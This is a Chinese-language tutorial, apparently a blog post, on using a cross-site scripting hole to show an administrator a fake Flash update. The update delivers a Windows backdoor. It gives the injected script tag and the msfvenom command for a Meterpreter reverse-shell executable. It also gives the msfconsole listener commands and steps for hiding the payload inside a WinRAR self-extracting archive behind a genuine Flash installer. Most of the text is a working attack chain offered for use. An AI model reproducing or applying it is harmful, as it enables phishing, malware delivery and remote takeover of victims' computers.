Bootstrap

使用xss进行flash钓鱼攻击黑掉windows电脑

复制xssaq.com中公共模块flash钓鱼的js代码

找一个可以被访问到的地方保存为js文件

 

 在xxs之盲打页面植入一个xxs漏洞,目的是让管理员的页面引用js文件

 <script src="http://192.168.216.67/1.js"></script>

 

 管理员登陆后,页面变成下图

 

 点击立即升级后,执行1.js,会下载inst.exe文件(可更改)

 

 修改文件和地址,为了添加合理性,毕竟是升级flash,再建立一个flash.exe文件

 

 现在管理员点击升级后下载的就是flash.exe文件了

 

 接下来就是往flash.exe放入病毒和伪装flash.exe

 制作病毒

 打开kali虚拟机

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.31.130 LPORT=4444 -f exe > shell.exe                       ip是虚拟机的

 

 将shell.exe文件放到flash.exe文件的地方,将名字改为flash.exe,将原来的删掉

 这样病毒就可以正常使用了

在kali虚拟机中设置监听,这样可以知道受害者有没有点击病毒

一个一个输入

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 你自己虚拟机的ip

set port 4444

run

 

 接下来模拟受害者

 点击升级后会下载flash.exe,点击之后

 

 kali虚拟机监听到病毒被点击,且控制了点击者的电脑

 伪装病毒

先在官网上下载一个正常的flash

 再下载一个WinRAR

同时选中flash和flashcenter这两个文件 ,点击添加

   路径写所有windows电脑都有的路径

 先运行正常的,后运行病毒

 点击全隐藏选项

 之后点确定就行 ,将那两个给删除掉,留下压缩包就行

 现在受害者点击升级,下载的是flash.exe压缩包,解压后表面上运行flashcenter_pp_ax_install_cn.exe的安装界面,暗地里运行flash.exe的病毒,之后通过kali虚拟机监听到,控制受害者的电脑。

;